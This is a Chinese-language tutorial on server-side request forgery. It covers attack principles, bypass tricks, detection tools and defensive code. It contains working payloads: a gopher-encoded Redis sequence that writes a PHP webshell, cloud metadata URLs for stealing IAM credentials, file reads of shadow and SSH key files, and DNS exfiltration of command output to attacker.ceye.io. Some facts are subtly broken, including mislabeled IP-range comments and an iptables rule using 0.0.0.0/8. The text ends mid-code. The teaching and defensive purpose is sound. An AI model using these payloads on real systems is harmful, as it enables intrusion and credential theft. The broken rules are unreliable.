SSRF漏洞详解

我将全面讲解SSRF(Server-Side Request Forgery,服务器端请求伪造)漏洞的原理、利用方式和防护措施。

一、SSRF漏洞原理

1.1 什么是SSRF

SSRF是一种由攻击者构造恶意请求,让服务器端发起请求的安全漏洞。攻击者利用服务器作为代理,访问内部网络资源或执行未授权操作。

1.2 攻击原理

核心机制:

  • 应用程序接收用户提供的URL
  • 服务器根据URL发起请求
  • 攻击者控制URL,指向内部资源或恶意地址
  • 服务器返回内部资源内容或执行恶意操作

攻击流程图:

1
2
3
4
攻击者 → Web应用 → 内部服务器/云元数据/本地文件
↑ ↓
└──────────┘
返回敏感信息

典型场景示例:

1
2
3
4
5
6
7
8
9
10
11
# 存在漏洞的代码
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
response = requests.get(url) # 直接使用用户输入的URL
return response.content

# 攻击请求
http://example.com/fetch?url=http://localhost:6379/ # 访问内部Redis
http://example.com/fetch?url=http://169.254.169.254/latest/meta-data/ # 云元数据
http://example.com/fetch?url=file:///etc/passwd # 读取本地文件

1.3 SSRF的前提条件

  1. 应用程序从用户输入获取URL
  2. 服务器对URL发起请求
  3. 缺乏URL验证或验证不严格
  4. 服务器可访问内部网络资源

1.4 SSRF与其他漏洞的区别

漏洞类型 请求发起者 主要目标
SSRF 服务器 内部网络、云服务
CSRF 用户浏览器 用户账户操作
XSS 用户浏览器 窃取用户数据

二、SSRF漏洞类型

2.1 基于协议的分类

1. HTTP/HTTPS协议SSRF

最常见的类型,用于访问Web服务。

1
2
3
4
5
6
# 漏洞代码
import requests

url = request.args.get('url')
resp = requests.get(url)
return resp.text

攻击示例:

1
2
3
4
5
# 访问内网Web服务
?url=http://192.168.1.100/admin

# 访问云元数据
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

2. File协议SSRF

读取本地文件系统。

1
2
3
4
5
6
7
# 读取系统文件
?url=file:///etc/passwd
?url=file:///etc/shadow
?url=file:///proc/self/environ

# Windows系统
?url=file:///C:/Windows/System32/drivers/etc/hosts

3. Gopher协议SSRF

最强大的协议,可构造任意TCP数据包。

1
2
3
4
5
6
7
8
# 攻击Redis(未授权)
?url=gopher://127.0.0.1:6379/_SET%20test%20value

# 攻击MySQL
?url=gopher://127.0.0.1:3306/_[构造的MySQL协议数据]

# 发送POST请求
?url=gopher://internal-api:80/_POST%20/api%20HTTP/1.1%0d%0aHost:%20internal-api%0d%0a...

4. Dict协议SSRF

用于探测端口和服务信息。

1
2
3
4
# 端口扫描
?url=dict://192.168.1.1:22/
?url=dict://192.168.1.1:3306/
?url=dict://192.168.1.1:6379/

5. FTP协议SSRF

1
?url=ftp://internal-ftp-server/sensitive-file.txt

2.2 根据响应分类

有回显SSRF(Basic SSRF)

服务器将请求结果返回给攻击者。

1
2
3
4
5
6
# 有回显示例
@app.route('/proxy')
def proxy():
url = request.args.get('url')
response = requests.get(url)
return response.text # 直接返回内容

无回显SSRF(Blind SSRF)

服务器发起请求但不返回结果,需要通过旁路方式判断。

1
2
3
4
5
6
# 无回显示例
@app.route('/webhook')
def webhook():
url = request.args.get('callback_url')
requests.get(url) # 发送请求但不返回结果
return "Webhook triggered"

无回显检测方法:

  • 使用Burp Collaborator或DNSlog接收DNS查询
  • 通过时间延迟判断
  • 通过错误消息差异判断

三、SSRF常见利用场景

3.1 探测内网信息

1. 端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
# 扫描内网存活主机和开放端口
import requests

def scan_internal_network():
for i in range(1, 255):
for port in [22, 80, 443, 3306, 6379, 8080]:
url = f"http://192.168.1.{i}:{port}"
try:
requests.get(f"http://vulnerable-app.com/fetch?url={url}", timeout=1)
print(f"[+] {url} is open")
except:
pass

利用技巧:

1
2
3
4
5
6
7
8
# 根据响应时间判断
?url=http://192.168.1.100:22 # SSH端口,响应慢
?url=http://192.168.1.100:80 # HTTP端口,快速响应或返回内容

# 根据错误信息判断
Connection refused → 端口关闭
Timeout → 主机不存在或防火墙拦截
200 OK → 端口开放且为Web服务

2. 服务识别

1
2
3
4
5
# 访问常见服务默认页面
?url=http://192.168.1.100/ # Web服务
?url=http://192.168.1.100:9200/ # Elasticsearch
?url=http://192.168.1.100:8080/manager/html # Tomcat
?url=http://192.168.1.100:5000/ # Docker Registry

3.2 攻击内网服务

1. 攻击Redis

未授权访问:

1
2
3
4
5
6
7
8
9
10
# 使用Gopher协议写入WebShell
# 构造Redis命令
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a
<?php system($_GET['cmd']);?>
%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a
$3%0d%0adir%0d%0a$13%0d%0a/var/www/html%0d%0a
*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a
$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a
*1%0d%0a$4%0d%0asave%0d%0a

自动化工具:

1
2
# Gopherus工具生成Payload
python gopherus.py --exploit redis

2. 攻击MySQL

1
2
3
4
5
6
# 读取文件
gopher://127.0.0.1:3306/_[MySQL协议]
SELECT LOAD_FILE('/etc/passwd');

# 写入文件(需要权限)
SELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/info.php';

3. 攻击FastCGI

1
2
# 执行任意PHP代码
gopher://127.0.0.1:9000/_[FastCGI协议包]

4. 攻击内网API

1
2
3
4
5
6
# 访问内部管理接口
?url=http://internal-admin.local/api/users
?url=http://internal-admin.local/api/delete_user?id=1

# 访问Kubernetes API
?url=http://kubernetes.default.svc/api/v1/namespaces/default/pods

3.3 攻击云服务元数据

AWS EC2元数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 获取实例身份信息
?url=http://169.254.169.254/latest/meta-data/

# 获取IAM角色凭证(最危险)
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/[role-name]

# 返回示例:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "xxx...",
"Token": "xxx...",
"Expiration": "2025-10-17T12:00:00Z"
}

# 获取用户数据(可能包含敏感信息)
?url=http://169.254.169.254/latest/user-data/

AWS IMDSv2防护(需要Token):

1
2
3
4
5
6
7
8
# IMDSv2需要先获取Token
# 1. 获取Token(需要PUT请求)
PUT http://169.254.169.254/latest/api/token
X-aws-ec2-metadata-token-ttl-seconds: 21600

# 2. 使用Token访问
GET http://169.254.169.254/latest/meta-data/
X-aws-ec2-metadata-token: [token]

Google Cloud元数据

1
2
3
4
5
6
7
8
9
# 获取访问令牌
?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
?url=http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

# 需要Header:Metadata-Flavor: Google
# 绕过方法:某些SSRF可能允许设置自定义Header

# 获取项目信息
?url=http://metadata.google.internal/computeMetadata/v1/project/project-id

Azure元数据

1
2
3
4
5
6
7
# 获取访问令牌
?url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

# 需要Header:Metadata: true

# 获取实例信息
?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01

阿里云元数据

1
2
3
# 获取实例信息
?url=http://100.100.100.200/latest/meta-data/
?url=http://100.100.100.200/latest/meta-data/ram/security-credentials/[role-name]

3.4 读取本地文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Linux系统
?url=file:///etc/passwd
?url=file:///etc/shadow
?url=file:///root/.ssh/id_rsa
?url=file:///proc/self/environ # 环境变量
?url=file:///proc/self/cmdline # 命令行参数
?url=file:///var/log/apache2/access.log

# Windows系统
?url=file:///C:/Windows/System32/drivers/etc/hosts
?url=file:///C:/Users/Administrator/.ssh/id_rsa
?url=file:///C:/inetpub/wwwroot/web.config

# 应用配置文件
?url=file:///var/www/html/config.php
?url=file:///etc/nginx/nginx.conf
?url=file:///etc/mysql/my.cnf

3.5 绕过访问控制

绕过IP白名单

1
2
3
# 应用只允许访问特定域名
# 通过DNS重绑定绕过
?url=http://attacker-domain.com # 先解析到白名单IP,后解析到内网IP

绕过防火墙

1
2
# 利用服务器作为跳板
?url=http://internal-server/admin # 防火墙允许Web服务器访问

3.6 拒绝服务攻击(DoS)

1
2
3
4
5
6
7
8
# 大文件下载
?url=http://example.com/huge-file.iso

# 慢速响应
?url=http://slow-server.com/endless-response

# 循环请求
?url=http://vulnerable-app.com/fetch?url=http://vulnerable-app.com/fetch?url=...

四、SSRF利用技巧与绕过

4.1 URL解析绕过

1. 使用@符号

1
2
3
# 浏览器解析为:访问evil.com,用户名为example.com
?url=http://example.com@evil.com
?url=http://whitelisted.com@192.168.1.1

2. IP地址变形

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 十进制
?url=http://2130706433/ # 127.0.0.1

# 十六进制
?url=http://0x7f000001/ # 127.0.0.1

# 八进制
?url=http://0177.0.0.1/ # 127.0.0.1

# 混合格式
?url=http://127.1/ # 127.0.0.1
?url=http://127.0.1/ # 127.0.0.1

# 十进制点分格式
?url=http://2852039166/ # 169.254.169.254

Python转换脚本:

1
2
3
4
5
6
def ip_to_decimal(ip):
parts = ip.split('.')
return sum(int(part) << (8 * (3 - i)) for i, part in enumerate(parts))

print(ip_to_decimal("127.0.0.1")) # 2130706433
print(ip_to_decimal("169.254.169.254")) # 2852039166

3. 使用短域名/重定向

1
2
3
4
5
6
7
# 注册短域名指向内网IP
?url=http://a.com # DNS解析为127.0.0.1

# 使用URL重定向
# 在attacker.com上设置:
# Location: http://169.254.169.254/latest/meta-data/
?url=http://attacker.com/redirect

重定向服务器示例:

1
2
3
4
5
6
7
from flask import Flask, redirect

app = Flask(__name__)

@app.route('/redirect')
def redirect_to_internal():
return redirect('http://169.254.169.254/latest/meta-data/')

4. DNS重绑定

1
2
3
4
5
6
7
8
9
10
# DNS服务器交替返回不同IP
# 第一次查询:返回白名单IP(通过验证)
# 第二次查询:返回内网IP(实际访问)

# 使用工具:
# - https://github.com/nccgroup/singularity
# - rbndr.us (在线DNS重绑定服务)

# 攻击示例
?url=http://rebind.it:80/[内网IP]/

5. URL编码绕过

1
2
3
4
5
6
7
8
9
10
11
# 单次编码
?url=http://127.0.0.1/ → http%3A%2F%2F127.0.0.1%2F

# 双重编码
http%3A%2F%2F127.0.0.1%2F → http%253A%252F%252F127.0.0.1%252F

# Unicode编码
?url=http://127.0.0.1/ → http://\u0031\u0032\u0037.0.0.1/

# 混合编码
?url=http://127.0.0.%31/

6. 协议混淆

1
2
3
4
5
6
7
8
9
10
11
# 大小写混淆
?url=HtTp://127.0.0.1/
?url=FiLe:///etc/passwd

# 多余斜杠
?url=http:///127.0.0.1
?url=http://127.0.0.1//admin

# 添加端口
?url=http://127.0.0.1:80/
?url=http://127.0.0.1:80@evil.com

4.2 黑名单绕过技巧

绕过127.0.0.1黑名单

1
2
3
4
5
6
7
8
9
10
11
12
# localhost变体
?url=http://localhost/
?url=http://127.1/
?url=http://0.0.0.0/
?url=http://[::1]/ # IPv6
?url=http://[0:0:0:0:0:ffff:7f00:1]/ # IPv6映射IPv4

# 域名解析
?url=http://localtest.me/ # 解析为127.0.0.1
?url=http://lvh.me/ # 解析为127.0.0.1
?url=http://nip.io/ # 自定义IP解析,如127.0.0.1.nip.io
?url=http://vcap.me/ # 解析为127.0.0.1

绕过169.254.169.254黑名单

1
2
3
4
5
6
7
8
9
10
11
# 使用短网址服务
?url=http://bit.ly/2IIwGi5 # 重定向到元数据地址

# 使用DNS解析
?url=http://169.254.169.254.nip.io/

# 十进制IP
?url=http://2852039166/

# 注册指向该IP的域名
?url=http://metadata.attacker.com/

绕过内网IP段黑名单

1
2
3
4
5
6
7
8
9
10
# 使用罕见内网段
?url=http://10.0.0.1/ # 常见,可能被拦截
?url=http://172.16.0.1/ # 10.0.0.0/8
?url=http://192.168.1.1/ # 172.16.0.0/12
?url=http://100.64.0.1/ # 192.168.0.0/16 (运营商NAT)

# IPv6内网地址
?url=http://[::ffff:192.168.1.1]/
?url=http://[fe80::1]/ # 链路本地地址
?url=http://[fc00::1]/ # 唯一本地地址

4.3 协议绕过技巧

1
2
3
4
5
6
7
8
# 使用Gopher协议绕过HTTP限制
?url=gopher://127.0.0.1:80/_GET%20/admin%20HTTP/1.1%0d%0aHost:%20127.0.0.1

# 使用Dict协议探测
?url=dict://127.0.0.1:6379/info

# SFTP协议
?url=sftp://internal-server/file.txt

4.4 无回显SSRF利用

1. 使用DNS外带

1
2
3
4
5
6
7
8
# 利用DNSlog平台
# 平台:dnslog.cn, ceye.io, burpcollaborator

# 攻击payload
?url=http://`whoami`.attacker.ceye.io/
?url=http://$(cat /etc/passwd | base64).attacker.ceye.io/

# 监听DNS查询记录获取数据

2. 时间盲注

1
2
3
4
5
6
# Redis SLEEP命令
?url=gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aSLEEP%0d%0a$1%0d%0a5

# 根据响应时间判断
# 长时间 → 命令执行成功
# 短时间 → 命令失败或服务不存在

3. 基于错误的判断

1
2
3
4
5
6
7
# 访问不存在的端口
?url=http://127.0.0.1:65535/ # 快速失败

# 访问存在的服务
?url=http://127.0.0.1:6379/ # 可能返回协议错误

# 通过错误消息差异判断服务类型

五、SSRF漏洞检测

5.1 手工检测步骤

步骤1:识别潜在注入点

1
2
3
4
5
6
# 常见的SSRF注入点
- URL参数:?url=, ?link=, ?src=, ?target=, ?redirect=
- 文件导入:?import=, ?file=, ?path=, ?document=
- 回调地址:?callback=, ?webhook=, ?notify=
- 图片/资源加载:?image=, ?avatar=, ?resource=
- API代理:?api=, ?proxy=, ?endpoint=

步骤2:基础测试

1
2
3
4
5
6
7
8
9
10
11
# 1. 测试是否接受外部URL
?url=http://example.com/

# 2. 测试是否可访问内网
?url=http://127.0.0.1/
?url=http://192.168.1.1/

# 3. 测试协议支持
?url=file:///etc/passwd
?url=gopher://127.0.0.1:6379/
?url=dict://127.0.0.1:6379/

步骤3:深度测试

1
2
3
4
5
6
7
8
9
10
11
12
# 端口扫描
for port in 22 80 443 3306 6379 8080 9200; do
curl "http://target.com/fetch?url=http://127.0.0.1:$port"
done

# 云元数据测试
?url=http://169.254.169.254/latest/meta-data/
?url=http://metadata.google.internal/computeMetadata/v1/

# 文件读取测试
?url=file:///etc/passwd
?url=file:///proc/self/environ

5.2 自动化检测工具

1. SSRFmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 安装
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap
pip3 install -r requirements.txt

# 使用
python3 ssrfmap.py -r request.txt -p url -m readfiles
python3 ssrfmap.py -r request.txt -p url -m portscan

# 模块说明
- readfiles: 读取文件
- portscan: 端口扫描
- networkscan: 网络扫描
- redis: 攻击Redis
- mysql: 攻击MySQL

2. Gopherus

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 安装
git clone https://github.com/tarunkant/Gopherus
cd Gopherus
chmod +x gopherus.py

# 生成Redis攻击payload
python gopherus.py --exploit redis

# 生成MySQL攻击payload
python gopherus.py --exploit mysql

# 支持的服务
- Redis
- MySQL
- FastCGI
- Memcached
- SMTP
- Zabbix

3. Burp Suite插件

1
2
3
- Collaborator Everywhere: 自动在请求中插入Collaborator地址
- SSRFDetector: 自动检测SSRF漏洞
- J2EEScan: 检测Java应用SSRF

5.3 检测清单

1
2
3
4
5
6
7
8
9
10
□ 是否接受用户输入的URL?
□ 是否限制访问协议(http/https only)?
□ 是否限制访问IP段(禁止内网)?
□ 是否限制访问端口(仅80/443)?
□ 是否验证响应内容类型?
□ 是否有DNS重绑定防护?
□ 是否有请求超时限制?
□ 是否限制重定向次数?
□ 是否过滤元数据地址?
□ 是否使用白名单验证?

六、SSRF防护措施

6.1 输入验证与过滤

1. 协议白名单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# 仅允许HTTP/HTTPS协议
from urllib.parse import urlparse

def validate_url_protocol(url):
"""验证URL协议"""
parsed = urlparse(url)
allowed_schemes = ['http', 'https']

if parsed.scheme.lower() not in allowed_schemes:
raise ValueError(f"不允许的协议: {parsed.scheme}")

return True

# 使用示例
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')

try:
validate_url_protocol(url)
response = requests.get(url, timeout=5)
return response.content
except ValueError as e:
return str(e), 400

2. IP地址黑名单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import ipaddress
from urllib.parse import urlparse
import socket

def is_internal_ip(hostname):
"""检查是否为内网IP"""
try:
# 解析主机名为IP
ip = socket.gethostbyname(hostname)
ip_obj = ipaddress.ip_address(ip)

# 检查是否为私有IP
if ip_obj.is_private:
return True

# 检查是否为保留IP
if ip_obj.is_reserved:
return True

# 检查是否为回环地址
if ip_obj.is_loopback:
return True

# 检查是否为链路本地地址
if ip_obj.is_link_local:
return True

# 检查云元数据地址
if str(ip_obj) == '169.254.169.254':
return True

# 检查其他特殊地址
special_ips = [
'0.0.0.0',
'100.64.0.0/10', # 运营商NAT
]

for special_ip in special_ips:
if '/' in special_ip:
if ip_obj in ipaddress.ip_network(special_ip):
return True
elif str(ip_obj) == special_ip:
return True

return False

except (socket.gaierror, ValueError):
return True # 无法解析时拒绝访问

def validate_url_safe(url):
"""验证URL安全性"""
parsed = urlparse(url)

# 验证协议
if parsed.scheme.lower() not in ['http', 'https']:
raise ValueError("仅允许HTTP/HTTPS协议")

# 验证主机名
hostname = parsed.hostname
if not hostname:
raise ValueError("无效的主机名")

# 检查是否为内网IP
if is_internal_ip(hostname):
raise ValueError("禁止访问内网地址")

return True

# 使用示例
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')

try:
validate_url_safe(url)
response = requests.get(url, timeout=5)
return response.content
except ValueError as e:
return str(e), 403

3. 域名白名单(推荐)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def validate_url_whitelist(url, allowed_domains):
"""使用白名单验证URL"""
parsed = urlparse(url)
hostname = parsed.hostname

if not hostname:
raise ValueError("无效的URL")

# 检查是否在白名单中
# 支持完全匹配和子域名匹配
is_allowed = False
for allowed_domain in allowed_domains:
if allowed_domain.startswith('.'):
# .example.com 匹配 *.example.com
if hostname.endswith(allowed_domain) or hostname == allowed_domain[1:]:
is_allowed = True
break
else:
# example.com 仅匹配 example.com
if hostname == allowed_domain:
is_allowed = True
break

if not is_allowed:
raise ValueError(f"域名 {hostname} 不在白名单中")

return True

# 使用示例
ALLOWED_DOMAINS = [
'example.com',
'.trusted-api.com', # 允许所有子域名
'api.partner.com'
]

@app.route('/fetch')
def fetch_url():
url = request.args.get('url')

try:
validate_url_whitelist(url, ALLOWED_DOMAINS)
response = requests.get(url, timeout=5)
1
2
3
    return response.content
except ValueError as e:
return str(e), 403

6.2 DNS重绑定防护

1. 二次DNS解析验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import socket
import time
import ipaddress

def resolve_and_validate(hostname, max_retries=3):
"""
多次解析DNS并验证IP一致性
防止DNS重绑定攻击
"""
resolved_ips = []

for i in range(max_retries):
try:
ip = socket.gethostbyname(hostname)
resolved_ips.append(ip)

# 检查IP是否为内网地址
ip_obj = ipaddress.ip_address(ip)
if ip_obj.is_private or ip_obj.is_loopback or ip_obj.is_link_local:
raise ValueError(f"解析到内网地址: {ip}")

# 短暂延迟后再次解析
if i < max_retries - 1:
time.sleep(0.5)

except socket.gaierror:
raise ValueError(f"无法解析域名: {hostname}")

# 验证所有解析结果是否一致
if len(set(resolved_ips)) > 1:
raise ValueError(f"DNS解析结果不一致,可能存在DNS重绑定攻击: {resolved_ips}")

return resolved_ips[0]

def safe_request(url, timeout=5):
"""安全的HTTP请求"""
from urllib.parse import urlparse
import requests

parsed = urlparse(url)
hostname = parsed.hostname

# 第一次解析并验证
ip = resolve_and_validate(hostname)

# 使用解析后的IP发起请求
# 但保持原始Host头
url_with_ip = url.replace(hostname, ip)
headers = {'Host': hostname}

response = requests.get(url_with_ip, headers=headers, timeout=timeout)
return response

# 使用示例
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')

try:
response = safe_request(url)
return response.content
except Exception as e:
return str(e), 400

2. 使用固定DNS服务器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.connection import create_connection

# 自定义DNS解析器
class FixedDNSAdapter(HTTPAdapter):
def __init__(self, dns_server='8.8.8.8', *args, **kwargs):
self.dns_server = dns_server
super().__init__(*args, **kwargs)

def init_poolmanager(self, *args, **kwargs):
# 设置DNS服务器
import dns.resolver
resolver = dns.resolver.Resolver()
resolver.nameservers = [self.dns_server]

# 替换socket的DNS解析
original_getaddrinfo = socket.getaddrinfo

def custom_getaddrinfo(host, port, *args, **kwargs):
try:
answers = resolver.resolve(host, 'A')
ip = str(answers[0])
return original_getaddrinfo(ip, port, *args, **kwargs)
except:
return original_getaddrinfo(host, port, *args, **kwargs)

socket.getaddrinfo = custom_getaddrinfo
return super().init_poolmanager(*args, **kwargs)

# 使用固定DNS
session = requests.Session()
session.mount('http://', FixedDNSAdapter(dns_server='8.8.8.8'))
session.mount('https://', FixedDNSAdapter(dns_server='8.8.8.8'))

6.3 网络层防护

1. 使用代理/沙箱环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def fetch_via_proxy(url):
"""
通过专用代理服务器发起请求
代理服务器应部署在隔离网络中,无法访问内网
"""
proxies = {
'http': 'http://proxy-server:8080',
'https': 'http://proxy-server:8080'
}

response = requests.get(
url,
proxies=proxies,
timeout=10,
allow_redirects=False # 禁止自动跟随重定向
)

return response

2. 网络隔离

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Docker Compose配置示例
# 将Web应用放在受限网络中

version: '3'
services:
web-app:
image: my-web-app
networks:
- dmz
# 不连接到内网网络

internal-service:
image: internal-service
networks:
- internal
# 仅在内网网络

networks:
dmz:
driver: bridge
internal: false # 可访问外网
internal:
driver: bridge
internal: true # 隔离网络,无法访问外网

3. 防火墙规则

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# iptables规则示例
# 禁止Web应用服务器访问内网

# 允许访问外网HTTP/HTTPS
iptables -A OUTPUT -p tcp --dport 80 -d 0.0.0.0/8 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -d 0.0.0.0/8 -j ACCEPT

# 禁止访问内网IP段
iptables -A OUTPUT -d 10.0.0.0/8 -j DROP
iptables -A OUTPUT -d 172.16.0.0/12 -j DROP
iptables -A OUTPUT -d 192.168.0.0/16 -j DROP
iptables -A OUTPUT -d 127.0.0.0/8 -j DROP

# 禁止访问云元数据
iptables -A OUTPUT -d 169.254.169.254 -j DROP

6.4 请求限制

1. 限制重定向

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def safe_request_with_redirect_limit(url, max_redirects=0):
"""
限制HTTP重定向次数
防止通过重定向绕过防护
"""
session = requests.Session()
session.max_redirects = max_redirects

try:
response = session.get(
url,
timeout=5,
allow_redirects=(max_redirects > 0)
)

# 如果允许重定向,验证每个重定向URL
if max_redirects > 0 and response.history:
for resp in response.history:
validate_url_safe(resp.url)

return response

except requests.TooManyRedirects:
raise ValueError("重定向次数过多")

2. 超时设置

1
2
3
4
5
6
7
8
9
10
11
def request_with_timeout(url):
"""设置严格的超时限制"""
try:
response = requests.get(
url,
timeout=(3, 10), # (连接超时, 读取超时)
stream=False
)
return response
except requests.Timeout:
raise ValueError("请求超时")

3. 响应大小限制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def request_with_size_limit(url, max_size=10*1024*1024):  # 10MB
"""限制响应大小"""
response = requests.get(
url,
timeout=10,
stream=True # 流式读取
)

content = b''
for chunk in response.iter_content(chunk_size=8192):
content += chunk
if len(content) > max_size:
raise ValueError("响应内容过大")

return content

4. 限制访问端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def validate_port(url, allowed_ports=[80, 443, 8080]):
"""限制可访问的端口"""
from urllib.parse import urlparse

parsed = urlparse(url)
port = parsed.port

# 如果没有指定端口,使用默认端口
if port is None:
if parsed.scheme == 'http':
port = 80
elif parsed.scheme == 'https':
port = 443

if port not in allowed_ports:
raise ValueError(f"不允许访问端口 {port}")

return True

6.5 响应内容验证

1. Content-Type验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
def validate_response_type(response, allowed_types=['text/html', 'application/json']):
"""验证响应内容类型"""
content_type = response.headers.get('Content-Type', '')

is_allowed = any(
allowed_type in content_type
for allowed_type in allowed_types
)

if not is_allowed:
raise ValueError(f"不允许的内容类型: {content_type}")

return True

@app.route('/fetch')
def fetch_url():
url = request.args.get('url')

try:
validate_url_safe(url)
response = requests.get(url, timeout=5)
validate_response_type(response, ['application/json'])
return response.content
except ValueError as e:
return str(e), 400

2. 内容过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def sanitize_response(content):
"""过滤响应内容中的敏感信息"""
import re

# 移除可能的敏感信息
sensitive_patterns = [
r'password[\s:=]+\S+',
r'secret[\s:=]+\S+',
r'token[\s:=]+\S+',
r'api[_-]?key[\s:=]+\S+',
r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b', # 邮箱
]

for pattern in sensitive_patterns:
content = re.sub(pattern, '[REDACTED]', content, flags=re.IGNORECASE)

return content

6.6 云环境特殊防护

1. AWS IMDSv2强制使用

1
2
3
4
5
6
# 在EC2实例上强制使用IMDSv2
# 通过AWS CLI配置
aws ec2 modify-instance-metadata-options \
--instance-id i-1234567890abcdef0 \
--http-tokens required \
--http-put-response-hop-limit 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 应用层防护:拦截元数据访问
def block_metadata_access(url):
"""阻止访问云元数据服务"""
from urllib.parse import urlparse

parsed = urlparse(url)
hostname = parsed.hostname

# AWS元数据地址
if hostname in ['169.254.169.254', 'metadata.google.internal',
'100.100.100.200']: # 阿里云
raise ValueError("禁止访问云元数据服务")

# Google Cloud
if 'metadata.google.internal' in hostname:
raise ValueError("禁止访问云元数据服务")

return True

2. Kubernetes环境防护

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# NetworkPolicy示例
# 限制Pod访问Kubernetes API
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: deny-k8s-api
spec:
podSelector:
matchLabels:
app: web-app
policyTypes:
- Egress
egress:
- to:
- podSelector: {}
ports:
- protocol: TCP
port: 80
- protocol: TCP
port: 443
# 不包含到Kubernetes API的规则

6.7 完整防护代码示例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
import requests
import ipaddress
import socket
from urllib.parse import urlparse
from functools import wraps
import time

class SSRFProtection:
"""SSRF防护类"""

def __init__(self):
# 配置
self.allowed_schemes = ['http', 'https']
self.allowed_ports = [80, 443, 8080]
self.max_redirects = 0
self.timeout = (3, 10)
self.max_response_size = 10 * 1024 * 1024 # 10MB
self.allowed_content_types = ['text/html', 'application/json', 'text/plain']

# 黑名单IP段
self.blocked_ip_ranges = [
ipaddress.ip_network('0.0.0.0/8'),
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('169.254.0.0/16'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('224.0.0.0/4'),
]

# 白名单域名(可选)
self.allowed_domains = None # 设置为列表启用白名单模式

def validate_url(self, url):
"""综合URL验证"""
parsed = urlparse(url)

# 1. 验证协议
if parsed.scheme.lower() not in self.allowed_schemes:
raise ValueError(f"不允许的协议: {parsed.scheme}")

# 2. 验证主机名
hostname = parsed.hostname
if not hostname:
raise ValueError("无效的主机名")

# 3. 白名单验证(如果启用)
if self.allowed_domains:
self._validate_domain_whitelist(hostname)

# 4. 验证端口
self._validate_port(parsed)

# 5. DNS解析并验证IP
self._validate_ip(hostname)

return True

def _validate_domain_whitelist(self, hostname):
"""验证域名白名单"""
is_allowed = False
for allowed_domain in self.allowed_domains:
if allowed_domain.startswith('.'):
if hostname.endswith(allowed_domain) or hostname == allowed_domain[1:]:
is_allowed = True
break
else:
